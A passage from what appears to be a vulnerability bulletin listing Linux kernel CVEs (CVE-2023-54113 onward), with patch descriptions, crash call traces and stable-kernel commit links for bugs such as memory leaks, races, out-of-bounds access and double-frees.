find_vmap_area+0x1f/0x70 vmalloc_dump_obj+0x20/0x60 mem_dump_obj+0x22/0x90 __call_rcu_common+0x5bf/0x940 ? debug_smp_processor_id+0x1b/0x30 call_rcu_hurry+0x14/0x20 rcu_torture_init+0x1f82/0x2370 ? __pfx_rcu_torture_leak_cb+0x10/0x10 ? __pfx_rcu_torture_leak_cb+0x10/0x10 ? __pfx_rcu_torture_init+0x10/0x10 do_one_initcall+0x6c/0x300 ? debug_smp_processor_id+0x1b/0x30 kernel_init_freeable+0x2b9/0x540 ? __pfx_kernel_init+0x10/0x10 kernel_init+0x1f/0x150 ret_from_fork+0x40/0x50 ? __pfx_kernel_init+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> The previous patch fixes this by using the deadlock-safe best-effort version of find_vm_area. However, in case of failure print the fact that the pointer was a vmalloc pointer so that we print at least something. | 2025-12-24 | not yet calculated | CVE-2023-54113 | https://git.kernel.org/stable/c/0a22f9c17b1aa2a35b5eedee928f7841595b55cd https://git.kernel.org/stable/c/3f7a4e88e40e38c0b16a4bcb599b7b1d8c81440d https://git.kernel.org/stable/c/dddca4c46ec92f83449bc91dd199f46a89e066be https://git.kernel.org/stable/c/8fb1601ec0a2c4c34fc2170af767e5c2a6400573 https://git.kernel.org/stable/c/c83ad36a18c02c0f51280b50272327807916987f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nsh: Use correct mac_offset to unwind gso skb in nsh_gso_segment() As the call trace shows, skb_panic was caused by wrong skb->mac_header in nsh_gso_segment(): invalid opcode: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 3 PID: 2737 Comm: syz Not tainted 6.3.0-next-20230505 #1 RIP: 0010:skb_panic+0xda/0xe0 call Trace: skb_push+0x91/0xa0 nsh_gso_segment+0x4f3/0x570 skb_mac_gso_segment+0x19e/0x270 __skb_gso_segment+0x1e8/0x3c0 validate_xmit_skb+0x452/0x890 validate_xmit_skb_list+0x99/0xd0 sch_direct_xmit+0x294/0x7c0 __dev_queue_xmit+0x16f0/0x1d70 packet_xmit+0x185/0x210 packet_snd+0xc15/0x1170 packet_sendmsg+0x7b/0xa0 sock_sendmsg+0x14f/0x160 The root cause is: nsh_gso_segment() use skb->network_header - nhoff to reset mac_header in skb_gso_error_unwind() if inner-layer protocol gso fails. However, skb->network_header may be reset by inner-layer protocol gso function e.g. mpls_gso_segment. skb->mac_header reset by the inaccurate network_header will be larger than skb headroom. nsh_gso_segment nhoff = skb->network_header - skb->mac_header; __skb_pull(skb,nsh_len) skb_mac_gso_segment mpls_gso_segment skb_reset_network_header(skb);//skb->network_header+=nsh_len return -EINVAL; skb_gso_error_unwind skb_push(skb, nsh_len); skb->mac_header = skb->network_header - nhoff; // skb->mac_header > skb->headroom, cause skb_push panic Use correct mac_offset to restore mac_header and get rid of nhoff. | 2025-12-24 | not yet calculated | CVE-2023-54114 | https://git.kernel.org/stable/c/2f88c8d38ecf5ed0273f99a067246899ba499eb2 https://git.kernel.org/stable/c/d2309e0cb27b6871b273fbc1725e93be62570d86 https://git.kernel.org/stable/c/435855b0831b351cb72cb38369ee33122ce9574c https://git.kernel.org/stable/c/02b20e0bc0c2628539e9e518dc342787c3332de2 https://git.kernel.org/stable/c/cdd8160dcda1fed2028a5f96575a84afc23aff7d https://git.kernel.org/stable/c/6fbedf987b6b8ed54a50e2205d998eb2c8be72f9 https://git.kernel.org/stable/c/cb38e62922aa3991793344b5a5870e7291c74a44 https://git.kernel.org/stable/c/c83b49383b595be50647f0c764a48c78b5f3c4f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pcmcia: rsrc_nonstatic: Fix memory leak in nonstatic_release_resource_db() When nonstatic_release_resource_db() frees all resources associated with an PCMCIA socket, it forgets to free socket_data too, causing a memory leak observable with kmemleak: unreferenced object 0xc28d1000 (size 64): comm "systemd-udevd", pid 297, jiffies 4294898478 (age 194.484s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 f0 85 0e c3 00 00 00 00 ................ 00 00 00 00 0c 10 8d c2 00 00 00 00 00 00 00 00 ................ backtrace: [<ffda4245>] __kmem_cache_alloc_node+0x2d7/0x4a0 [<7e51f0c8>] kmalloc_trace+0x31/0xa4 [<d52b4ca0>] nonstatic_init+0x24/0x1a4 [pcmcia_rsrc] [<a2f13e08>] pcmcia_register_socket+0x200/0x35c [pcmcia_core] [<a728be1b>] yenta_probe+0x4d8/0xa70 [yenta_socket] [<c48fac39>] pci_device_probe+0x99/0x194 [<84b7c690>] really_probe+0x181/0x45c [<8060fe6e>] __driver_probe_device+0x75/0x1f4 [<b9b76f43>] driver_probe_device+0x28/0xac [<648b766f>] __driver_attach+0xeb/0x1e4 [<6e9659eb>] bus_for_each_dev+0x61/0xb4 [<25a669f3>] driver_attach+0x1e/0x28 [<d8671d6b>] bus_add_driver+0x102/0x20c [<df0d323c>] driver_register+0x5b/0x120 [<942cd8a4>] __pci_register_driver+0x44/0x4c [<e536027e>] __UNIQUE_ID___addressable_cleanup_module188+0x1c/0xfffff000 [iTCO_vendor_support] Fix this by freeing socket_data too. Tested on a Acer Travelmate 4002WLMi by manually binding/unbinding the yenta_cardbus driver (yenta_socket). | 2025-12-24 | not yet calculated | CVE-2023-54115 | https://git.kernel.org/stable/c/bde0b6da7bd893c37afaee3555cc3ac3be582313 https://git.kernel.org/stable/c/2d45e2be0be35a3d66863563ed2591ee18a6897e https://git.kernel.org/stable/c/22100df1d57f04cf2370d5347b9ef547f481deea https://git.kernel.org/stable/c/04bb8af40a7729c398ed4caea7e66cedd2881719 https://git.kernel.org/stable/c/97fd1c8e9c5aa833aab7e836760bc13103afa892 https://git.kernel.org/stable/c/e8a80cf06b4bb0396212289d651b384c949f09d0 https://git.kernel.org/stable/c/fd53a1f28faba2c4806c055e706a7721006291c1 https://git.kernel.org/stable/c/c85fd9422fe0f5d667305efb27f56d09eab120b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/fbdev-generic: prohibit potential out-of-bounds access The fbdev test of IGT may write after EOF, which lead to out-of-bound access for drm drivers with fbdev-generic. For example, run fbdev test on a x86+ast2400 platform, with 1680x1050 resolution, will cause the linux kernel hang with the following call trace: Oops: 0000 [#1] PREEMPT SMP PTI [IGT] fbdev: starting subtest eof Workqueue: events drm_fb_helper_damage_work [drm_kms_helper] [IGT] fbdev: starting subtest nullptr RIP: 0010:memcpy_erms+0xa/0x20 RSP: 0018:ffffa17d40167d98 EFLAGS: 00010246 RAX: ffffa17d4eb7fa80 RBX: ffffa17d40e0aa80 RCX: 00000000000014c0 RDX: 0000000000001a40 RSI: ffffa17d40e0b000 RDI: ffffa17d4eb80000 RBP: ffffa17d40167e20 R08: 0000000000000000 R09: ffff89522ecff8c0 R10: ffffa17d4e4c5000 R11: 0000000000000000 R12: ffffa17d4eb7fa80 R13: 0000000000001a40 R14: 000000000000041a R15: ffffa17d40167e30 FS: 0000000000000000(0000) GS:ffff895257380000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffa17d40e0b000 CR3: 00000001eaeca006 CR4: 00000000001706e0 Call Trace: <TASK> ? drm_fbdev_generic_helper_fb_dirty+0x207/0x330 [drm_kms_helper] drm_fb_helper_damage_work+0x8f/0x170 [drm_kms_helper] process_one_work+0x21f/0x430 worker_thread+0x4e/0x3c0 ? __pfx_worker_thread+0x10/0x10 kthread+0xf4/0x120 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2c/0x50 </TASK> CR2: ffffa17d40e0b000 ---[ end trace 0000000000000000 ]--- The is because damage rectangles computed by drm_fb_helper_memory_range_to_clip() function is not guaranteed to be bound in the screen's active display area. Possible reasons are: 1) Buffers are allocated in the granularity of page size, for mmap system call support. The shadow screen buffer consumed by fbdev emulation may also choosed be page size aligned. 2) The DIV_ROUND_UP() used in drm_fb_helper_memory_range_to_clip() will introduce off-by-one error. For example, on a 16KB page size system, in order to store a 1920x1080 XRGB framebuffer, we need allocate 507 pages. Unfortunately, the size 1920*1080*4 can not be divided exactly by 16KB. 1920 * 1080 * 4 = 8294400 bytes 506 * 16 * 1024 = 8290304 bytes 507 * 16 * 1024 = 8306688 bytes line_length = 1920*4 = 7680 bytes 507 * 16 * 1024 / 7680 = 1081.6 off / line_length = 507 * 16 * 1024 / 7680 = 1081 DIV_ROUND_UP(507 * 16 * 1024, 7680) will yeild 1082 memcpy_toio() typically issue the copy line by line, when copy the last line, out-of-bound access will be happen. Because: 1082 * line_length = 1082 * 7680 = 8309760, and 8309760 > 8306688 Note that userspace may still write to the invisiable area if a larger buffer than width x stride is exposed. But it is not a big issue as long as there still have memory resolve the access if not drafting so far. - Also limit the y1 (Daniel) - keep fix patch it to minimal (Daniel) - screen_size is page size aligned because of it need mmap (Thomas) - Adding fixes tag (Thomas) | 2025-12-24 | not yet calculated | CVE-2023-54116 | https://git.kernel.org/stable/c/efd2821b8abeccb6b51423002e2a62921481a26e https://git.kernel.org/stable/c/251653fa974ea551a15d16cacfed7cde68cc7f87 https://git.kernel.org/stable/c/c8687694bb1f5c48134f152f8c5c2e53483eb99d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/dcssblk: fix kernel crash with list_add corruption Commit fb08a1908cb1 ("dax: simplify the dax_device <-> gendisk association") introduced new logic for gendisk association, requiring drivers to explicitly call dax_add_host() and dax_remove_host(). For dcssblk driver, some dax_remove_host() calls were missing, e.g. in device remove path. The commit also broke error handling for out_dax case in device add path, resulting in an extra put_device() w/o the previous get_device() in that case. This lead to stale xarray entries after device add / remove cycles. In the case when a previously used struct gendisk pointer (xarray index) would be used again, because blk_alloc_disk() happened to return such a pointer, the xa_insert() in dax_add_host() would fail and go to out_dax, doing the extra put_device() in the error path. In combination with an already flawed error handling in dcssblk (device_register() cleanup), which needs to be addressed in a separate patch, this resulted in a missing device_del() / klist_del(), and eventually in the kernel crash with list_add corruption on a subsequent device_add() / klist_add(). Fix this by adding the missing dax_remove_host() calls, and also move the put_device() in the error path to restore the previous logic. | 2025-12-24 | not yet calculated | CVE-2023-54117 | https://git.kernel.org/stable/c/6489ec0107860345bc57dcde39e63dfb05ac5c11 https://git.kernel.org/stable/c/b7ad75c77349beb4983b9f27108d9b3f33ae1413 https://git.kernel.org/stable/c/b5c531a9a7d8e047c90c909f09cef06a9f8e62f4 https://git.kernel.org/stable/c/c8f40a0bccefd613748d080147469a4652d6e74c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: sc16is7xx: setup GPIO controller later in probe The GPIO controller component of the sc16is7xx driver is setup too early, which can result in a race condition where another device tries to utilise the GPIO lines before the sc16is7xx device has finished initialising. This issue manifests itself as an Oops when the GPIO lines are configured: Unable to handle kernel read from unreadable memory at virtual address ... pc : sc16is7xx_gpio_direction_output+0x68/0x108 [sc16is7xx] lr : sc16is7xx_gpio_direction_output+0x4c/0x108 [sc16is7xx] ... Call trace: sc16is7xx_gpio_direction_output+0x68/0x108 [sc16is7xx] gpiod_direction_output_raw_commit+0x64/0x318 gpiod_direction_output+0xb0/0x170 create_gpio_led+0xec/0x198 gpio_led_probe+0x16c/0x4f0 platform_drv_probe+0x5c/0xb0 really_probe+0xe8/0x448 driver_probe_device+0xe8/0x138 __device_attach_driver+0x94/0x118 bus_for_each_drv+0x8c/0xe0 __device_attach+0x100/0x1b8 device_initial_probe+0x28/0x38 bus_probe_device+0xa4/0xb0 deferred_probe_work_func+0x90/0xe0 process_one_work+0x1c4/0x480 worker_thread+0x54/0x430 kthread+0x138/0x150 ret_from_fork+0x10/0x1c This patch moves the setup of the GPIO controller functions to later in the probe function, ensuring the sc16is7xx device has already finished initialising by the time other devices try to make use of the GPIO lines. The error handling has also been reordered to reflect the new initialisation order. | 2025-12-24 | not yet calculated | CVE-2023-54118 | https://git.kernel.org/stable/c/17b96b5c19bec791b433890549e44ca523dc82aa https://git.kernel.org/stable/c/49b326ce8a686428d8cbb82ed74fc88ed3f95a51 https://git.kernel.org/stable/c/f57c2164d082a36d177ab7fbf54c18970df89c22 https://git.kernel.org/stable/c/b71ff206707855ce73c04794c76f7b678b2d4f72 https://git.kernel.org/stable/c/c8f71b49ee4d28930c4a6798d1969fa91dc4ef3e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inotify: Avoid reporting event with invalid wd When inotify_freeing_mark() races with inotify_handle_inode_event() it can happen that inotify_handle_inode_event() sees that i_mark->wd got already reset to -1 and reports this value to userspace which can confuse the inotify listener. Avoid the problem by validating that wd is sensible (and pretend the mark got removed before the event got generated otherwise). | 2025-12-24 | not yet calculated | CVE-2023-54119 | https://git.kernel.org/stable/c/8fb33166aed888769ea63d6af49515893f8a1f14 https://git.kernel.org/stable/c/2d65c97777e5b4a845637800d5d7b648f5772106 https://git.kernel.org/stable/c/17ad86d8c12220de97e80d88b5b4c934a40e1812 https://git.kernel.org/stable/c/145f54ea336b06cf4f92eeee996f2ffca939ea43 https://git.kernel.org/stable/c/fb3294998489d39835006240e9c6e6b2ac62022e https://git.kernel.org/stable/c/a48bacee05860c6089c3482bcdc80720b0ee5732 https://git.kernel.org/stable/c/c915d8f5918bea7c3962b09b8884ca128bfd9b0c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix race condition in hidp_session_thread There is a potential race condition in hidp_session_thread that may lead to use-after-free. For instance, the timer is active while hidp_del_timer is called in hidp_session_thread(). After hidp_session_put, then 'session' will be freed, causing kernel panic when hidp_idle_timeout is running. The solution is to use del_timer_sync instead of del_timer. Here is the call trace: ? hidp_session_probe+0x780/0x780 call_timer_fn+0x2d/0x1e0 __run_timers.part.0+0x569/0x940 hidp_session_probe+0x780/0x780 call_timer_fn+0x1e0/0x1e0 ktime_get+0x5c/0xf0 lapic_next_deadline+0x2c/0x40 clockevents_program_event+0x205/0x320 run_timer_softirq+0xa9/0x1b0 __do_softirq+0x1b9/0x641 __irq_exit_rcu+0xdc/0x190 irq_exit_rcu+0xe/0x20 sysvec_apic_timer_interrupt+0xa1/0xc0 | 2025-12-24 | not yet calculated | CVE-2023-54120 | https://git.kernel.org/stable/c/152f47bd6b995e0e98c85672f6d19894bc287ef2 https://git.kernel.org/stable/c/5f3d214d19899183d4e0cce7552998262112e4ab https://git.kernel.org/stable/c/8a99e6200c38b78a45dcd12a6bdc43fdf4dc36be https://git.kernel.org/stable/c/f7ec5ca433ceead8d9d78fd2febff094f289441d https://git.kernel.org/stable/c/0efb276d5848a3accc37c6f41b85e442c4768169 https://git.kernel.org/stable/c/f6719fd8f409fa1da8dc956e93822d25e1e8b360 https://git.kernel.org/stable/c/248af9feca062a4ca9c3f2ccf67056c8a5eb817f https://git.kernel.org/stable/c/c95930abd687fcd1aa040dc4fe90dff947916460 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix incorrect splitting in btrfs_drop_extent_map_range In production we were seeing a variety of WARN_ON()'s in the extent_map code, specifically in btrfs_drop_extent_map_range() when we have to call add_extent_mapping() for our second split. Consider the following extent map layout PINNED [0 16K) [32K, 48K) and then we call btrfs_drop_extent_map_range for [0, 36K), with skip_pinned == true. The initial loop will have start = 0 end = 36K len = 36K we will find the [0, 16k) extent, but since we are pinned we will skip it, which has this code start = em_end; if (end != (u64)-1) len = start + len - em_end; em_end here is 16K, so now the values are start = 16K len = 16K + 36K - 16K = 36K len should instead be 20K. This is a problem when we find the next extent at [32K, 48K), we need to split this extent to leave [36K, 48k), however the code for the split looks like this split->start = start + len; split->len = em_end - (start + len); In this case we have em_end = 48K split->start = 16K + 36K // this should be 16K + 20K split->len = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K and now we have an invalid extent_map in the tree that potentially overlaps other entries in the extent map. Even in the non-overlapping case we will have split->start set improperly, which will cause problems with any block related calculations. We don't actually need len in this loop, we can simply use end as our end point, and only adjust start up when we find a pinned extent we need to skip. Adjust the logic to do this, which keeps us from inserting an invalid extent map. We only skip_pinned in the relocation case, so this is relatively rare, except in the case where you are running relocation a lot, which can happen with auto relocation on. | 2025-12-24 | not yet calculated | CVE-2023-54121 | https://git.kernel.org/stable/c/9f68e2105dd96cf0fafffffafb2337fbd0fbae1f https://git.kernel.org/stable/c/b43a4c99d878cf5e59040e45c96bb0a8358bfb3b https://git.kernel.org/stable/c/c962098ca4af146f2625ed64399926a098752c9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Add check for cstate As kzalloc may fail and return NULL pointer, it should be better to check cstate in order to avoid the NULL pointer dereference in __drm_atomic_helper_crtc_reset. Patchwork: https://patchwork.freedesktop.org/patch/514163/ | 2025-12-24 | not yet calculated | CVE-2023-54122 | https://git.kernel.org/stable/c/a6afb8293ec0932f4ed0b7aecfc0ccc00f44dc2b https://git.kernel.org/stable/c/31f2f8de0ea7387cde18a24f94ba5e0b886b9842 https://git.kernel.org/stable/c/d4ba50614cb3f0686bbdb505af685d78e75861dc https://git.kernel.org/stable/c/42442d42c57b9fbc35cb5ef72c7e5347c5f7d082 https://git.kernel.org/stable/c/a52e5a002d18bffabff66f6f59a74f8e9aac5afe https://git.kernel.org/stable/c/c96988b7d99327bb08bd9efd29a203b22cd88ace |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix memleak for 'conf->bio_split' In the error path of raid10_run(), 'conf' need be freed, however, 'conf->bio_split' is missed and memory will be leaked. Since there are 3 places to free 'conf', factor out a helper to fix the problem. | 2025-12-24 | not yet calculated | CVE-2023-54123 | https://git.kernel.org/stable/c/133008af833b4f2e021d2c294c29c70364a3f0ba https://git.kernel.org/stable/c/b6460f68c1cc95a80d089af402be501619f228e4 https://git.kernel.org/stable/c/6361b0592b46c465ac926c1f3105d66c30d9658b https://git.kernel.org/stable/c/7f673fa34c0e3f95ee951a1bbf61791164871d2e https://git.kernel.org/stable/c/b21019a220d9cac08819bb6c63000de9ee61eb9e https://git.kernel.org/stable/c/5cba3e26c073b535e4e3b825ea481fb29c53943b https://git.kernel.org/stable/c/e2fec8d95353a48634b085011626ba3ec8ab8b1c https://git.kernel.org/stable/c/c9ac2acde53f5385de185bccf6aaa91cf9ac1541 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to drop all dirty pages during umount() if cp_error is set xfstest generic/361 reports a bug as below: f2fs_bug_on(sbi, sbi->fsync_node_num); kernel BUG at fs/f2fs/super.c:1627! RIP: 0010:f2fs_put_super+0x3a8/0x3b0 Call Trace: generic_shutdown_super+0x8c/0x1b0 kill_block_super+0x2b/0x60 kill_f2fs_super+0x87/0x110 deactivate_locked_super+0x39/0x80 deactivate_super+0x46/0x50 cleanup_mnt+0x109/0x170 __cleanup_mnt+0x16/0x20 task_work_run+0x65/0xa0 exit_to_user_mode_prepare+0x175/0x190 syscall_exit_to_user_mode+0x25/0x50 do_syscall_64+0x4c/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc During umount(), if cp_error is set, f2fs_wait_on_all_pages() should not stop waiting all F2FS_WB_CP_DATA pages to be writebacked, otherwise, fsync_node_num can be non-zero after f2fs_wait_on_all_pages() causing this bug. In this case, to avoid deadloop in f2fs_wait_on_all_pages(), it needs to drop all dirty pages rather than redirtying them. | 2025-12-24 | not yet calculated | CVE-2023-54124 | https://git.kernel.org/stable/c/92575f05a32dafb16348bfa5e62478118a9be069 https://git.kernel.org/stable/c/4ceedc2f8bdffb82e40b7d1bb912304f8e157cb1 https://git.kernel.org/stable/c/ad87bd313f70b51e48019d5ce2d02d73152356b3 https://git.kernel.org/stable/c/d8f4ad5f3979dbd8e6251259562f12472717883a https://git.kernel.org/stable/c/7741ddc882a0c806a6508ba8203c55a779db7a21 https://git.kernel.org/stable/c/82c3d6e9db41cbd3af1d4f90bdb441740b5fad10 https://git.kernel.org/stable/c/c9b3649a934d131151111354bcbb638076f03a30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Return error for inconsistent extended attributes ntfs_read_ea is called when we want to read extended attributes. There are some sanity checks for the validity of the EAs. However, it fails to return a proper error code for the inconsistent attributes, which might lead to unpredicted memory accesses after return. [ 138.916927] BUG: KASAN: use-after-free in ntfs_set_ea+0x453/0xbf0 [ 138.923876] Write of size 4 at addr ffff88800205cfac by task poc/199 [ 138.931132] [ 138.933016] CPU: 0 PID: 199 Comm: poc Not tainted 6.2.0-rc1+ #4 [ 138.938070] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 [ 138.947327] Call Trace: [ 138.949557] <TASK> [ 138.951539] dump_stack_lvl+0x4d/0x67 [ 138.956834] print_report+0x16f/0x4a6 [ 138.960798] ? ntfs_set_ea+0x453/0xbf0 [ 138.964437] ? kasan_complete_mode_report_info+0x7d/0x200 [ 138.969793] ? ntfs_set_ea+0x453/0xbf0 [ 138.973523] kasan_report+0xb8/0x140 [ 138.976740] ? ntfs_set_ea+0x453/0xbf0 [ 138.980578] __asan_store4+0x76/0xa0 [ 138.984669] ntfs_set_ea+0x453/0xbf0 [ 138.988115] ? __pfx_ntfs_set_ea+0x10/0x10 [ 138.993390] ? kernel_text_address+0xd3/0xe0 [ 138.998270] ? __kernel_text_address+0x16/0x50 [ 139.002121] ? unwind_get_return_address+0x3e/0x60 [ 139.005659] ? __pfx_stack_trace_consume_entry+0x10/0x10 [ 139.010177] ? arch_stack_walk+0xa2/0x100 [ 139.013657] ? filter_irq_stacks+0x27/0x80 [ 139.017018] ntfs_setxattr+0x405/0x440 [ 139.022151] ? __pfx_ntfs_setxattr+0x10/0x10 [ 139.026569] ? kvmalloc_node+0x2d/0x120 [ 139.030329] ? kasan_save_stack+0x41/0x60 [ 139.033883] ? kasan_save_stack+0x2a/0x60 [ 139.037338] ? kasan_set_track+0x29/0x40 [ 139.040163] ? kasan_save_alloc_info+0x1f/0x30 [ 139.043588] ? __kasan_kmalloc+0x8b/0xa0 [ 139.047255] ? __kmalloc_node+0x68/0x150 [ 139.051264] ? kvmalloc_node+0x2d/0x120 [ 139.055301] ? vmemdup_user+0x2b/0xa0 [ 139.058584] __vfs_setxattr+0x121/0x170 [ 139.062617] ? __pfx___vfs_setxattr+0x10/0x10 [ 139.066282] __vfs_setxattr_noperm+0x97/0x300 [ 139.070061] __vfs_setxattr_locked+0x145/0x170 [ 139.073580] vfs_setxattr+0x137/0x2a0 [ 139.076641] ? __pfx_vfs_setxattr+0x10/0x10 [ 139.080223] ? __kasan_check_write+0x18/0x20 [ 139.084234] do_setxattr+0xce/0x150 [ 139.087768] setxattr+0x126/0x140 [ 139.091250] ? __pfx_setxattr+0x10/0x10 [ 139.094948] ? __virt_addr_valid+0xcb/0x140 [ 139.097838] ? __call_rcu_common.constprop.0+0x1c7/0x330 [ 139.102688] ? debug_smp_processor_id+0x1b/0x30 [ 139.105985] ? kasan_quarantine_put+0x5b/0x190 [ 139.109980] ? putname+0x84/0xa0 [ 139.113886] ? __kasan_slab_free+0x11e/0x1b0 [ 139.117961] ? putname+0x84/0xa0 [ 139.121316] ? preempt_count_sub+0x1c/0xd0 [ 139.124427] ? __mnt_want_write+0xae/0x100 [ 139.127836] ? mnt_want_write+0x8f/0x150 [ 139.130954] path_setxattr+0x164/0x180 [ 139.133998] ? __pfx_path_setxattr+0x10/0x10 [ 139.137853] ? __pfx_ksys_pwrite64+0x10/0x10 [ 139.141299] ? debug_smp_processor_id+0x1b/0x30 [ 139.145714] ? fpregs_assert_state_consistent+0x6b/0x80 [ 139.150796] __x64_sys_setxattr+0x71/0x90 [ 139.155407] do_syscall_64+0x3f/0x90 [ 139.159035] entry_SYSCALL_64_after_hwframe+0x72/0xdc [ 139.163843] RIP: 0033:0x7f108cae4469 [ 139.166481] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 088 [ 139.183764] RSP: 002b:00007fff87588388 EFLAGS: 00000286 ORIG_RAX: 00000000000000bc [ 139.190657] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f108cae4469 [ 139.196586] RDX: 00007fff875883b0 RSI: 00007fff875883d1 RDI: 00007fff875883b6 [ 139.201716] RBP: 00007fff8758c530 R08: 0000000000000001 R09: 00007fff8758c618 [ 139.207940] R10: 0000000000000006 R11: 0000000000000286 R12: 00000000004004c0 [ 139.214007] R13: 00007fff8758c610 R14: 0000000000000000 R15 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54125 | https://git.kernel.org/stable/c/1474098b590a426d90f27bb992f17c326e0b60c1 https://git.kernel.org/stable/c/c9db0ff04649aa0b45f497183c957fe260f229f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: safexcel - Cleanup ring IRQ workqueues on load failure A failure loading the safexcel driver results in the following warning on boot, because the IRQ affinity has not been correctly cleaned up. Ensure we clean up the affinity and workqueues on a failure to load the driver. crypto-safexcel: probe of f2800000.crypto failed with error -2 ------------[ cut here ]------------ WARNING: CPU: 1 PID: 232 at kernel/irq/manage.c:1913 free_irq+0x300/0x340 Modules linked in: hwmon mdio_i2c crypto_safexcel(+) md5 sha256_generic libsha256 authenc libdes omap_rng rng_core nft_masq nft_nat nft_chain_nat nf_nat nft_ct nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink fuse autofs4 CPU: 1 PID: 232 Comm: systemd-udevd Tainted: G W 6.1.6-00002-g9d4898824677 #3 Hardware name: MikroTik RB5009 (DT) pstate: 600000c5 (nZCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : free_irq+0x300/0x340 lr : free_irq+0x2e0/0x340 sp : ffff800008fa3890 x29: ffff800008fa3890 x28: 0000000000000000 x27: 0000000000000000 x26: ffff8000008e6dc0 x25: ffff000009034cac x24: ffff000009034d50 x23: 0000000000000000 x22: 000000000000004a x21: ffff0000093e0d80 x20: ffff000009034c00 x19: ffff00000615fc00 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 000075f5c1584c5e x14: 0000000000000017 x13: 0000000000000000 x12: 0000000000000040 x11: ffff000000579b60 x10: ffff000000579b62 x9 : ffff800008bbe370 x8 : ffff000000579dd0 x7 : 0000000000000000 x6 : ffff000000579e18 x5 : ffff000000579da8 x4 : ffff800008ca0000 x3 : ffff800008ca0188 x2 : 0000000013033204 x1 : ffff000009034c00 x0 : ffff8000087eadf0 Call trace: free_irq+0x300/0x340 devm_irq_release+0x14/0x20 devres_release_all+0xa0/0x100 device_unbind_cleanup+0x14/0x60 really_probe+0x198/0x2d4 __driver_probe_device+0x74/0xdc driver_probe_device+0x3c/0x110 __driver_attach+0x8c/0x190 bus_for_each_dev+0x6c/0xc0 driver_attach+0x20/0x30 bus_add_driver+0x148/0x1fc driver_register+0x74/0x120 __platform_driver_register+0x24/0x30 safexcel_init+0x48/0x1000 [crypto_safexcel] do_one_initcall+0x4c/0x1b0 do_init_module+0x44/0x1cc load_module+0x1724/0x1be4 __do_sys_finit_module+0xbc/0x110 __arm64_sys_finit_module+0x1c/0x24 invoke_syscall+0x44/0x110 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x20/0x80 el0_svc+0x14/0x4c el0t_64_sync_handler+0xb0/0xb4 el0t_64_sync+0x148/0x14c ---[ end trace 0000000000000000 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54126 | https://git.kernel.org/stable/c/4f4de392f4926820ec1fd3573a016c704a68893d https://git.kernel.org/stable/c/0a89d4a075524cf1f865cfdbb9cf38ab8e3e5409 https://git.kernel.org/stable/c/09e177d6f7edd0873a63f51abe914902ec0f4400 https://git.kernel.org/stable/c/4d9d2fd86766ee3ec077c011aa482e85b6c9595c https://git.kernel.org/stable/c/162f9daf0c22480f88b24fd46d16abae46c10fce https://git.kernel.org/stable/c/ab573af2655ba509e2a167897de9b5585c2ca44d https://git.kernel.org/stable/c/ca25c00ccbc5f942c63897ed23584cfc66e8ec81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/jfs: prevent double-free in dbUnmount() after failed jfs_remount() Syzkaller reported the following issue: ================================================================== BUG: KASAN: double-free in slab_free mm/slub.c:3787 [inline] BUG: KASAN: double-free in __kmem_cache_free+0x71/0x110 mm/slub.c:3800 Free of addr ffff888086408000 by task syz-executor.4/12750 [...] Call Trace: <TASK> [...] kasan_report_invalid_free+0xac/0xd0 mm/kasan/report.c:482 ____kasan_slab_free+0xfb/0x120 kasan_slab_free include/linux/kasan.h:177 [inline] slab_free_hook mm/slub.c:1781 [inline] slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807 slab_free mm/slub.c:3787 [inline] __kmem_cache_free+0x71/0x110 mm/slub.c:3800 dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264 jfs_umount+0x248/0x3b0 fs/jfs/jfs_umount.c:87 jfs_put_super+0x86/0x190 fs/jfs/super.c:194 generic_shutdown_super+0x130/0x310 fs/super.c:492 kill_block_super+0x79/0xd0 fs/super.c:1386 deactivate_locked_super+0xa7/0xf0 fs/super.c:332 cleanup_mnt+0x494/0x520 fs/namespace.c:1291 task_work_run+0x243/0x300 kernel/task_work.c:179 resume_user_mode_work include/linux/resume_user_mode.h:49 [inline] exit_to_user_mode_loop+0x124/0x150 kernel/entry/common.c:171 exit_to_user_mode_prepare+0xb2/0x140 kernel/entry/common.c:203 __syscall_exit_to_user_mode_work kernel/entry/common.c:285 [inline] syscall_exit_to_user_mode+0x26/0x60 kernel/entry/common.c:296 do_syscall_64+0x49/0xb0 arch/x86/entry/common.c:86 